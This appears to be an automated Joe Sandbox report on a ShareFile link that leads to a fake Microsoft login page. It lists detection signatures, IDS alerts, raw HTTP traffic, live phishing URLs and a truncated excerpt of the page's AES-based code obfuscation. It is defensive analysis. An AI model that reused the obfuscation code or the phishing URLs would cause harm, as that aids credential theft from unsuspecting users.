Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0

Overview

General Information

Sample URL:https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0
Analysis ID:1549641
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
AI detected landing page (webpage, office document or email)
Phishing site detected (based on logo match)
Detected non-DNS traffic on DNS port
Drops files with a non-matching file extension (content does not match file extension)
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
HTTP GET or POST without a user agent
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2012,i,10480968910564340078,1403565165516769674,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 5200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-05T20:36:02.020775+010020229301A Network Trojan was detected20.12.23.50443192.168.2.1749713TCP
2024-11-05T20:36:28.946645+010020229301A Network Trojan was detected4.245.163.56443192.168.2.1753602TCP
2024-11-05T20:36:30.506409+010020229301A Network Trojan was detected4.245.163.56443192.168.2.1753617TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-05T20:37:02.113734+010028286562Possible Social Engineering Attempted147.182.200.48443192.168.2.1753719TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlLLM: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The provided URL 'pub-10305130932840cc9846324aa165bbf7.r2.dev' does not match the legitimate domain for Microsoft., The URL contains a random string and uses the 'r2.dev' domain, which is not associated with Microsoft., The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but the URL does not match Microsoft's domain, raising suspicion., The use of a cloud service domain like 'r2.dev' could indicate a phishing attempt, especially when combined with a well-known brand like Microsoft. DOM: 3.9.pages.csv
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlMatcher: Template: microsoft matched
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlHTTP Parser: Number of links: 0
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlHTTP Parser: Total embedded image size: 45708
Source: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0HTTP Parser: Base64 decoded: {"version":3,"sources":["webpack://./node_modules/react-loading-skeleton/dist/skeleton.css"],"names":[],"mappings":"AAAA;EACE;IACE,2BAA2B;EAC7B;AACF;;AAEA;EACE,qBAAqB;EACrB,0BAA0B;EAC1B,0BAA0B;EAC1B,6BAA6B;EAC7B,+BAA+B,EAAE,qBAAqB;;EAEtD,mCAAmC;;EAEnC,WAA...
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlHTTP Parser: Title: Profile login does not match URL
Source: https://tmmc-radwvaste.com/200/#HTTP Parser: let usuuid = "z2azdtkqgaekjwdov0scddshscn91fymiobh65onsoadzmrdds0rzqsohyc/7tk5sqbluo+dxtrylp7ud0lezg=="; let policy = "pxmvmec2r2ugrndvjdt/6gp5msx1bwn4czrd0lm5xy9mvsoya3rymff+cnjdqdxc";let sv = "0"; let sir = "1"; function decstr(encryptedstring, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } const encrypteddata = cryptojs.enc.base64.parse(encryptedstring); const iv = cryptojs.lib.wordarray.create(encrypteddata.words.slice(0, 4)); const ciphertext = cryptojs.lib.wordarray.create( encrypteddata.words.slice(4) ); const decrypteddata = cryptojs.aes.decrypt( { ciphertext: ciphertext, }, cryptojs.enc.utf8.par...
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlHTTP Parser: No favicon
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlHTTP Parser: No favicon
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlHTTP Parser: No favicon
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlHTTP Parser: No favicon
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlHTTP Parser: No <meta name="author".. found
Source: https://pub-10305130932840cc9846324aa165bbf7.r2.dev/0nedrivedoc.htmlHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49774 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.17:53593 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:53594 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:53602 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:53617 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.75:443 -> 192.168.2.17:53709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:53711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.176:443 -> 192.168.2.17:53713 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.17:53592 -> 162.159.36.2:53
Source: global trafficHTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.17:49713
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.17:53602
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.17:53617
Source: Network trafficSuricata IDS: 2828656 - Severity 2 - ETPRO PHISHING Microsoft Live Account Verification Phishing Landing Nov 20 2017 : 147.182.200.48:443 -> 192.168.2.17:53719
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: global trafficHTTP traffic detected: GET /public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0 HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/spinner.css HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=5LPRMPAF0UjPp7QhxKLs5naNhMW8MwLRnUYOQ27ahbiKIOuZFQGNO+9KZ6xXwnOzocd7OTcta3nn+mg7xy87RuOxYWXCvrvsRM4mTDCagjoJ/ihCLQ1jpx/76vcTHZ6f4UNjzLfQ2moabk5pXNIWgt24xhlOzTQ1Cwe9AH+pffFo; AWSALBTGCORS=5LPRMPAF0UjPp7QhxKLs5naNhMW8MwLRnUYOQ27ahbiKIOuZFQGNO+9KZ6xXwnOzocd7OTcta3nn+mg7xy87RuOxYWXCvrvsRM4mTDCagjoJ/ihCLQ1jpx/76vcTHZ6f4UNjzLfQ2moabk5pXNIWgt24xhlOzTQ1Cwe9AH+pffFo; AWSALB=Snmn8pj0ZZ4uwxWtCZA3b0YHXcyu6K1Dlsief7t6XpBhPBE6HGa0tHCx/ffca3Z9HH7MtpPeOshsr0JBxIWo/HX69JyKONtlRtfJGLY3/Y+94W8Av55n50UqsDd5; AWSALBCORS=Snmn8pj0ZZ4uwxWtCZA3b0YHXcyu6K1Dlsief7t6XpBhPBE6HGa0tHCx/ffca3Z9HH7MtpPeOshsr0JBxIWo/HX69JyKONtlRtfJGLY3/Y+94W8Av55n50UqsDd5
Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1Host: 0093b71e39a6.us-east-1.sdk.awswaf.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/index.073b02341601d3e1503c.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=5LPRMPAF0UjPp7QhxKLs5naNhMW8MwLRnUYOQ27ahbiKIOuZFQGNO+9KZ6xXwnOzocd7OTcta3nn+mg7xy87RuOxYWXCvrvsRM4mTDCagjoJ/ihCLQ1jpx/76vcTHZ6f4UNjzLfQ2moabk5pXNIWgt24xhlOzTQ1Cwe9AH+pffFo; AWSALBTGCORS=5LPRMPAF0UjPp7QhxKLs5naNhMW8MwLRnUYOQ27ahbiKIOuZFQGNO+9KZ6xXwnOzocd7OTcta3nn+mg7xy87RuOxYWXCvrvsRM4mTDCagjoJ/ihCLQ1jpx/76vcTHZ6f4UNjzLfQ2moabk5pXNIWgt24xhlOzTQ1Cwe9AH+pffFo; AWSALB=Snmn8pj0ZZ4uwxWtCZA3b0YHXcyu6K1Dlsief7t6XpBhPBE6HGa0tHCx/ffca3Z9HH7MtpPeOshsr0JBxIWo/HX69JyKONtlRtfJGLY3/Y+94W8Av55n50UqsDd5; AWSALBCORS=Snmn8pj0ZZ4uwxWtCZA3b0YHXcyu6K1Dlsief7t6XpBhPBE6HGa0tHCx/ffca3Z9HH7MtpPeOshsr0JBxIWo/HX69JyKONtlRtfJGLY3/Y+94W8Av55n50UqsDd5
Source: global trafficHTTP traffic detected: GET /css/sharefilebrand/sf-spinner.svg HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://averellharriman.sharefile.com/css/spinner.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=7NQ3qANfjcNldCo/D4VMWzza0f2Ig2K578l4QPO+SFkRrjyy9dLqkGQT+GQvw1nxDQ2gbRf2R3sFiz+nU8KPPgRXkh9up5qd6UlKw4ju+UYjlY/qW0U3hx48V/T+BTDd+zbPNf3YFKiFl5yZRq2W/1PTyeeoIKFhTUa670lN9fV9; AWSALBTGCORS=7NQ3qANfjcNldCo/D4VMWzza0f2Ig2K578l4QPO+SFkRrjyy9dLqkGQT+GQvw1nxDQ2gbRf2R3sFiz+nU8KPPgRXkh9up5qd6UlKw4ju+UYjlY/qW0U3hx48V/T+BTDd+zbPNf3YFKiFl5yZRq2W/1PTyeeoIKFhTUa670lN9fV9; AWSALB=baEYrqmkfpbdO40bTHu3knPMluYu0f11/b6erumHx8FhurkHe+iMOzF04ujcT0DR2AO1Fo8OXcyUTWyA5nJJ/4lOqZQYIasGrQxs4n4o0dLMgbYhJ2trDQ8iDz+g; AWSALBCORS=baEYrqmkfpbdO40bTHu3knPMluYu0f11/b6erumHx8FhurkHe+iMOzF04ujcT0DR2AO1Fo8OXcyUTWyA5nJJ/4lOqZQYIasGrQxs4n4o0dLMgbYhJ2trDQ8iDz+g
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=z4zFrrzf2way3o4&MD=RMe6SWZc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /css/sharefilebrand/sf-spinner.svg HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=ecD9TD9PpQrkOP8zmk39anGSgBXdcZ4lsvLNWSixtmxOj/ry6gI1jOBmA3pTVqe6OOwVOERBcmHTtHSfzUHEUqj/rhELyaYC1F3p9XCNELYP59KRyqe5w1tgyRw5W/dBC2A0Gz614h+8KKi7Rui226xdlJyz9+toEtrqguE3aEm/; AWSALBTGCORS=ecD9TD9PpQrkOP8zmk39anGSgBXdcZ4lsvLNWSixtmxOj/ry6gI1jOBmA3pTVqe6OOwVOERBcmHTtHSfzUHEUqj/rhELyaYC1F3p9XCNELYP59KRyqe5w1tgyRw5W/dBC2A0Gz614h+8KKi7Rui226xdlJyz9+toEtrqguE3aEm/; AWSALB=qM5qVNEQoVWApP4i/0hGLJQ+y2y/9wU9ARjJSxbLv61ZHD9jcQx3vlEcN/GLvfuUbUaIla0Z7p7whjrNM+HLkO7F+9fGis674jOEFv++6ls1xhg+XUJSz+5hWST7; AWSALBCORS=qM5qVNEQoVWApP4i/0hGLJQ+y2y/9wU9ARjJSxbLv61ZHD9jcQx3vlEcN/GLvfuUbUaIla0Z7p7whjrNM+HLkO7F+9fGis674jOEFv++6ls1xhg+XUJSz+5hWST7
Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/index.073b02341601d3e1503c.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; AWSALBTGCORS=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; AWSALB=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R; AWSALBCORS=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R
Source: global trafficHTTP traffic detected: GET /bundles/7ba6967109e88a8ecd8d.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; AWSALBTGCORS=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; AWSALB=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R; AWSALBCORS=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R
Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /agent/static/74b07336-7560-45fc-7cd1-95032a784d52/pendo.js HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/92fe442fb8f2d1f7093b.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; AWSALBTGCORS=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; AWSALB=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R; AWSALBCORS=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R
Source: global trafficHTTP traffic detected: GET /sf/v3/Accounts/Branding HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /agent/static/74b07336-7560-45fc-7cd1-95032a784d52/pendo.js HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
